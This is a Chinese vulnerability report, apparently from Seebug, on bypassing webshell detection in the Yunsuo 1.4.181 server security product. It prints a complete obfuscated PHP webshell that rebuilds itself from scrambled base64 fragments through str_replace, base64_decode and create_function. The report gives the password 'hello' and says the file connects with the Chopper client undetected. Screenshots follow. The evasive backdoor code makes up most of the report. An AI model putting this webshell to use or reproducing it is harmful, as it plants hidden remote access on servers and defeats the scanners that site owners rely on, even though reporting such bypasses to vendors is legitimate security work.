最新版云锁1.4.181绕过webshell检测第一弹

### 简要描述： 最新版云锁1.4.181绕过webshell检测，可以成功jianlian ### 详细说明： 绕过一句话木马检测 ### 漏洞证明： 传统的一句话木马 <?php eval($_POST['X'])?> 可以被检测出来 以下面这种形式: ``` <?php $obji="XgqBsYWgqNlKGFycmF5gqKgqCcvW15cdz1cc10vgqJywngqLgq1xzLygqcpLgqCBhcnJheSgnJy"; $nxmc="wnKycpLCBqb2luKgqGFycmgqF5X3NsaWNgqlKCRhLCRjKCRhKS0zKSkpKSk7ZWNgqobyAnPC8nLigqRrLic+Jzt9"; $zjdu="JGM9J2gqNvdW50JzskYT0kX0gqNPT0tJRTtpZihgqygqZXNldCgkYSk9PSdoZScggqJiYgJGMoJGEpPjgqMpgqeyg"; $elyg = str_replace("ab","","str_abreabplaabcabe"); $qthr="qRgqrPSdsbG8nO2gqVjaG8ggqJzwgqnLgqiRrLic+gqJztldmFsKgqGJhcgq2U2NF9kZWNvZGUocHJlZ19gqyZ"; $pmqr = $elyg("y", "", "ybyaysey64y_ydyeycyoyde"); $gnxh = $elyg("g","","cgrgegagtgeg_gfgugngcgtgigogn"); $gdep = $gnxh('', $pmqr($elyg("gq", "", $zjdu.$qthr.$obji.$nxmc))); $gdep(); ?> ``` 密码是hello 把上面的代码保存为backdoor.php,并可以连接菜刀.就可以绕过云锁的一句话木马的检查 可以看到并没有检测到4.php的一句话木马，并且可以成功链接 [<img src="https://images.seebug.org/upload/201507/20154443fd2c635b12e73d5ab3b8eeffbac85dc1.png" alt="P.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/20154443fd2c635b12e73d5ab3b8eeffbac85dc1.png) [<img src="https://images.seebug.org/upload/201507/20154525d4f81f56d055025f1efedc1cb871f2c6.png" alt="p2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/20154525d4f81f56d055025f1efedc1cb871f2c6.png) [<img src="https://images.seebug.org/upload/201507/201545331ba6d2a6db09e549ca500bbba74067b4.png" alt="P3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/201545331ba6d2a6db09e549ca500bbba74067b4.png) [<img src="https://images.seebug.org/upload/201507/201545421685a88d33687de9f5bad27f0212872f.png" alt="p4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/201545421685a88d33687de9f5bad27f0212872f.png)